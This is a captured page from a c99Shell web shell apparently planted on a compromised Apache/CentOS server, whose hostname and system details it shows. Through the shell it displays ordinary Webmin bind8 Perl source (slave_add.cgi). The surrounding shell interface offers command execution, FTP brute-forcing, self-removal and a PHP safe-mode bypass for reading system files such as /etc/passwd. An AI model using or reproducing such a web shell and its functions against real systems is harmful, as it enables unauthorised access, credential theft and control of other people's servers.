!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bind8/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     slave_add.cgi (4.82 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Add or update a server or group from the webmin servers module

require './bind8-lib.pl';
$access{'slaves'} || &error($text{'slaves_ecannot'});
&ReadParse();
&foreign_require("servers", "servers-lib.pl");
@allservers = grep { $_->{'user'} } &servers::list_servers();

if ($in{'server'} =~ /^group_(\S+)/) {
    # Add all from a group
    ($group) = grep { $_->{'name'} eq $1 }
            &servers::list_all_groups(\@allservers);
    foreach $m (@{$group->{'members'}}) {
        push(@add, grep { $_->{'host'} eq $m } @allservers);
        }
    &error_setup($text{'add_gerr'});
    $msg = &text('add_gmsg', $group->{'name'});
    $in{'name_def'} || &error($text{'add_egname'});
    }
else {
    # Add a single host
    @add = grep { $_->{'id'} eq $in{'server'} } @allservers;
    &error_setup($text{'add_err'});
    $msg = &text('add_msg', &server_name($add[0]));
    $in{'name_def'} || &valdnsname($in{'name'}) ||
        &error($text{'add_ename'});
    }
$in{'view_def'} || $in{'view'} =~ /\S/ || &error($text{'add_eview'});
$myip = $config{'this_ip'} || &to_ipaddress(&get_system_hostname());
$myip && $myip ne "127.0.0.1" ||
    &error($text{'add_emyip'});

&ui_print_header(undef, $text{'add_title'}, "");
print "<b>$msg</b><p>\n";

# Setup error handler for down hosts
sub add_error
{
$add_error_msg = join("", @_);
}
&remote_error_setup(\&add_error);

# Build map from zone names to configs
$conf = &get_config();
%zmap = ( );
@zoneconfs = &find("zone", $conf);
foreach $v (@views) {
    push(@zoneconfs, &find("zone", $v->{'members'}));
    }
foreach $z (@zoneconfs) {
    $type = &find_value("type", $z->{'members'});
    if ($type eq "master") {
        $zmap{$z->{'value'}} = $z;
        }
    }

# Make sure each host is set up for BIND
@zones = grep { $_->{'type'} eq 'master' } &list_zone_names();
foreach $s (@add) {
    $s->{'bind8_view'} = $in{'view_def'} == 1 ? undef :
                 $in{'view_def'} == 2 ? "*" : $in{'view'};
    $add_error_msg = undef;
    local $bind8 = &remote_foreign_check($s, "bind8");
    if ($add_error_msg) {
        print "$add_error_msg<p>\n";
        next;
        }
    if (!$bind8) {
        print &text('add_echeck', $s->{'host'}),"<p>\n";
        next;
        }
    &remote_foreign_require($s, "bind8", "bind8-lib.pl");
    local $inst = &remote_foreign_call($s, "bind8",
                       "foreign_installed", "bind8", 1);
    if (!$inst) {
        print &text('add_emissing', $s->{'host'}),"<p>\n";
        next;
        }

    # Check for needed Webmin versions
    local $rver = &remote_foreign_call($s, "bind8", "get_webmin_version");
    if ($rver < 1.202) {
        print &text('add_eversion', $s->{'host'}, 1.202),"<p>\n";
        next;
        }
    if ($s->{'bind8_view'} && $s->{'bind8_view'} =~ /\s/ &&
        $rver < 1.422) {
        print &text('add_eversion2', $s->{'host'}, 1.422),"<p>\n";
        next;
        }

    # Check for non-IP name
    if (&check_ipaddress($s->{'host'}) && $in{'name_def'}) {
        print &text('add_eipaddr', $s->{'host'}),"<p>\n";
        next;
        }
    if (!$in{'name_def'} && &check_ipaddress($in{'name'})) {
        print &text('add_eipaddr', $s->{'host'}),"<p>\n";
        next;
        }

    @rzones = grep { $_->{'type'} ne 'view' }
               &remote_foreign_call($s, "bind8", "list_zone_names");
    print &text('add_ok', $s->{'host'}, scalar(@rzones)),"<p>\n";
    $s->{'sec'} = $in{'sec'};
    $s->{'nsname'} = $in{'name_def'} ? undef : $in{'name'};
    &add_slave_server($s);
    %rgot = map { $_->{'name'}, 1 } @rzones;

    if ($in{'sync'}) {
        # Add all master zones from this server to the slave
        $zcount = 0;
        $zerr = 0;
        $sip = &to_ipaddress($s->{'host'});
        foreach $zone (grep { !$rgot{$_->{'name'}} } @zones) {
            ($slaveerr) = &create_on_slaves($zone->{'name'}, $myip,
                undef, [ $s->{'host'} ], $zone->{'view'});
            if ($slaveerr) {
                $zerrs{$slaveerr->[0]->{'host'}} ||=
                    $slaveerr->[1];
                $zerr++;
                }
            else {
                $zcount++;
                }
            }

        # Restart the slave
        if ($zcount) {
            &remote_foreign_call($s, "bind8", "restart_bind");
            }

        # Add slave IP to master zone allow-transfer and also-notify
        # blocks
        $dchanged = 0;
        foreach $zone (@zones) {
            $z = $zmap{$zone->{'name'}};
            next if (!$z || !$sip);
            foreach $d ("also-notify", "allow-transfer") {
                $n = &find($d, $z->{'members'});
                next if (!$n);
                ($got) = grep { $_->{'name'} eq $sip }
                          @{$n->{'members'}};
                next if ($got);
                push(@{$n->{'members'}}, { 'name' => $sip });
                &lock_file($z->{'file'});
                &save_directive($z, $d, [ $n ], 1);
                &flush_file_lines($z->{'file'});
                $dchanged++;
                }
            }
        if ($dchanged) {
            &unlock_all_files();
            &restart_bind();
            }

        # Tell the user
        if ($zerr) {
            print &text('add_createerr', $s->{'host'},
                    $zcount, $zerr),"<br>\n";
            foreach $k (keys %zerrs) {
                print "$k : $zerrs{$k}<br>\n";
                }
            print "<p>\n";
            }
        else {
            print &text('add_createok', $s->{'host'},
                    $zcount),"<p>\n";
            }
        }
    }
&remote_finished();
if ($in{'add'}) {
    &webmin_log("add", "host", $add[0]->{'host'});
    }
else {
    &webmin_log("add", "group", $group->{'name'});
    }

&ui_print_footer("list_slaves.cgi", $text{'slaves_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--